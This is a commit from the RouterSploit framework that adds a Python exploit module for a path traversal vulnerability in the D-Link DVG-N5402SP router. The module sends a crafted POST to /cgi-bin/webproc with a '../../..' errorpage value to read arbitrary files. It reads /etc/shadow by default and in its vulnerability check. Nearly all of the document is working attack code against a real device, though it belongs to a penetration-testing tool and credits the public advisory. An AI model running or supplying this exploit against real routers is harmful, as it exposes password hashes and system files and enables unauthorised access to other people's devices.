D-Link DVG-N5402SP path traversal exploit

22327774 · Marcin Bury · 07cb0c69 · 22327774
Commit 22327774 authored Apr 17, 2016 by Marcin Bury
Hide whitespace changes
Inline Side-by-side

Showing with 75 additions and 0 deletions

dvg_n5402sp_path_traversal.py ...loit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py +75 -0

No files found.
--- a/routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
+++ b/routersploit/modules/exploits/dlink/dvg_n5402sp_path_traversal.py
+import requests
+
+from routersploit import (
+    exploits,
+    sanitize_url,
+    print_success,
+    print_error,
+    print_status,
+)
+
+
+class Exploit(exploits.Exploit):
+    """
+    Exploit implementation for D-Link DVG-N5402SP path traversal vulnerability.
+    If the target is vulnerable it allows to read files from the device."
+    """
+    __info__ = {
+        'name': 'D-Link DVG-N5402SP Path Traversal',
+        'description': 'Module exploits D-Link DVG-N5402SP path traversal vulnerability, which allows reading files form the device',
+        'authors': [
+            'Karn Ganeshen',  # vulnerability discovery
+            'Marcin Bury <marcin.bury[at]reverse-shell.com>',  # routersploit module
+        ],
+        'references': [
+            'https://www.exploit-db.com/exploits/39409/',
+            'http://ipositivesecurity.blogspot.com/2016/02/dlink-dvgn5402sp-multiple-vuln.html',
+        ],
+        'targets': [
+            'D-Link DVG-N5402SP',
+        ] 
+    }
+
+    target = exploits.Option('', 'Target address e.g. http://192.168.1.1')  # target address
+    port = exploits.Option(8080, 'Target port')  # default port
+    filename = exploits.Option('/etc/shadow', 'File to read')  # file to read
+
+    def run(self):
+        # address and parameters
+        url = sanitize_url("{}:{}/cgi-bin/webproc".format(self.target, self.port))
+        data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../..{}".format(self.filename), "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
+
+        # connection
+        try:
+            r = requests.post(url, data=data)
+        except (requests.exceptions.MissingSchema, requests.exceptions.InvalidSchema):
+            print_error("Invalid URL format: %s" % url)
+            return
+        except requests.exceptions.ConnectionError:
+            print_error("Connection error: %s" % url)
+            return
+
+        if r.status_code == 200:
+            print_success("Exploit success")
+            print_status("File: {}".format(self.filename))
+            print r.text
+        else:
+            print_error("Exploit failed")
+
+    def check(self):
+        # address and parameters
+        url = sanitize_url("{}:{}/cgi-bin/webproc".format(self.target, self.port))
+        data = {"getpage": "html/index.html","*errorpage*": "../../../../../../../../../../../etc/shadow", "var%3Amenu": "setup", "var%3Apage": "connected", "var%": "", "objaction": "auth", "%3Ausername": "blah", "%3Apassword": "blah","%3Aaction": "login","%3Asessionid": "abcdefgh"}
+
+        # connection
+        try:
+            r = requests.post(url, data=data)
+            res = r.text
+        except:
+            return None
+
+        if "root" in res:
+            return True  # target vulnerable
+
+        return False  # target not vulnerable
+